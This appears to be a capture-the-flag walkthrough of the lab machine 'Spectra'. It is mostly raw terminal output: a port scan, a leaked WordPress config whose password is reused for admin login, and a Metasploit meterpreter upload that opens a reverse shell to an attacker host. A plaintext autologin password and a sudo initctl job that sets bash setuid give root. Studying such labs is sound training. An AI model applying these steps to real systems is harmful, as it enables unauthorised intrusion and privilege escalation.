Spectra

$ sudo nmap -p- -T4 -A 10.10.10.229
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql            MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open  blackice-icecap?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Tue, 13 Apr 2021 21:03:56 GMT
|     Connection: close
|     Hello World
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Tue, 13 Apr 2021 21:04:02 GMT
|     Connection: close
|_    Hello World

http://spectra.htb/main/
http://spectra.htb/testing/  (directory listing is enabled, exposing the backup config below)
$ curl http://spectra.htb/testing/wp-config.php.save
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
Log in to http://spectra.htb/main with administrator/devteam01 — the database password from the leaked wp-config.php.save is reused for the WordPress administrator account.

$ msfconsole
msf6 > use exploit/unix/webapp/wp_admin_shell_upload 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.229
rhost => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
[-] Unknown command: ser.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturl => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.109
lhost => 10.10.14.109
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.109:4444 
[*] Authenticating with WordPress using administrator:devteam01...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /main/wp-content/plugins/ZmdnRtHCgv/pDjMUKSBiK.php...
[*] Sending stage (39282 bytes) to 10.10.10.229
[+] Deleted pDjMUKSBiK.php
[+] Deleted ZmdnRtHCgv.php
[+] Deleted ../ZmdnRtHCgv
[*] Meterpreter session 1 opened (10.10.14.109:4444 -> 10.10.10.229:35056) at 2021-04-13 19:57:04 -0400

meterpreter > shell
Process 29947 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
ls /home/
chronos
katie
nginx
root
user
ls /home/chronos
AutofillStates
BrowserMetrics-spare.pma
CrashpadMetrics-active.pma
Crowd Deny
Default
Dictionaries
FileTypePolicies
First Run
Floc
GrShaderCache
Local State
MEIPreload
OriginTrials
SSLErrorAssistant
Safe Browsing
Safe Browsing Cookies
Safe Browsing Cookies-journal
SafetyTips
ShaderCache
SmartDim
Subresource Filter
TLSDeprecationConfig
ZxcvbnData
chrome_shutdown_ms.txt
startup_settings_cache.json
user
ls /home/nginx
log
ls /home/katie
linpeas.sh  # https://linpeas.sh/ — Linux Privilege Escalation Awesome Script (linpeas.sh)
log
passwd
user.txt
cat /home/katie/user.txt
cat: /home/katie/user.txt: Permission denied
cat /home/katie/passwd
SummerHereWeCome!!				*******************
cat /etc/passwd
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
ls /opt
VirtualBox
autologin.conf.orig
broadcom
displaylink
eeti
google
neverware
tpm1
tpm2

cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

cat /etc/autologin
cat: /etc/autologin: Is a directory
ls /etc/autologin
passwd
cat /etc/autologin/passwd
SummerHereWeCome!!						***************

kali@kali:~/0.htb/machines/Spectra$ ssh katie@10.10.10.229
The authenticity of host '10.10.10.229 (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.229' (RSA) to the list of known hosts.
Password: 
Password: 
-bash-4.3$ 
-bash-4.3$ cat user.txt
e89d27fe195e9114ffa72ba8913a6130
-bash-4.3$ 
-bash-4.3$ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
-bash-4.3$ 

-bash-4.3$ vi /etc/init/test.conf 

script
chmod +s /bin/bash
end script
-bash-4.3$ sudo /sbin/initctl start test
test start/running, process 30646
-bash-4.3$ 
-bash-4.3$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3#
bash-4.3# ls
main  nodetest.js  root.txt  script.sh  startup  test.conf
bash-4.3# cat root.txt 
d44519713b889d5e1f9e536d0c6df2fc
bash-4.3# 








